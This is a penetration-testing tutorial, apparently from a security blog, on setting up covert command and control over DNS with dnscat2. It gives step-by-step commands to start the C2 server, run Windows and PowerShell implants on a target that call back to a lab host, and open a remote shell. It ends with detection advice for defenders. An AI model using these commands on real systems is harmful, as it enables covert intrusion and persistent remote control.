Command and Control – DNS

Even in the most restricted environments DNS traffic should be allowed to resolve internal or external domains. This can be used as a communication channel between a target host and the command and control server. Commands and data are included inside DNS queries and responses therefore detection is difficult since arbitrary commands are hiding in legitimate traffic.

Implementation of this technique is possible with the use of Dnscat2 which can create a command and control channel over the DNS protocol. This tool uses a client (implant) which is based in C and it needs to be executed on the target in order for the server to receive a connection. Traffic is transmitted in an encrypted form and also it supports authentication via pre-shared secrets.

Installation of this tool is easy by following the commands below from a Kali Linux 2.0 machine.

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install

The command and control server can initiated by using the following command.

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache

A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169

From Dnscat2 the red teamer can start the interaction with the existing session that has been created:

session -i 1

By executing “help” a list of available commands for usage can be retrieved:

Part of the functionality of dnscat2 is to upload and download files, execute other programs and obtaining a remote shell.

Obtaining a shell is easy with the “shell” command which will open another session:

The following output will appear on the command prompt of the target:

The shell will be interactive and fast and all the commands will be transferred over DNS traffic:

Launching another program remotely is possible by calling the executable:

exec notepad.exe

Luke Baggett developed a PowerShell version of the implant which have been introduced and described in the blackhillsinfosec website. The commands are the same but additional features have been added like interactive PowerShell session and ability to  run scripts directly from memory.

The following command needs to be executed from a PowerShell session on the target:

PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

It is also possible to establish a direct PowerShell session by running the following:

exec psh

A new console will created with the ability to execute PowerShell commands and scripts:

Conclusion

There are various advantages of command and control over DNS with dnscat2. Some of them are:

• Support of multiple sessions
• Traffic encryption
• Protection from MiTM attacks with secret key
• Run PowerShell scripts directly from memory
• Stealthy

Since detection is difficult due to the fact that arbitrary commands are transferred behind legitimate DNS traffic emphasis should be given to monitor the length of DNS queries and to allow hosts to communicate only with DNS servers that are trusted.

References

https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

PowerShell DNS Command & Control with dnscat2-powershell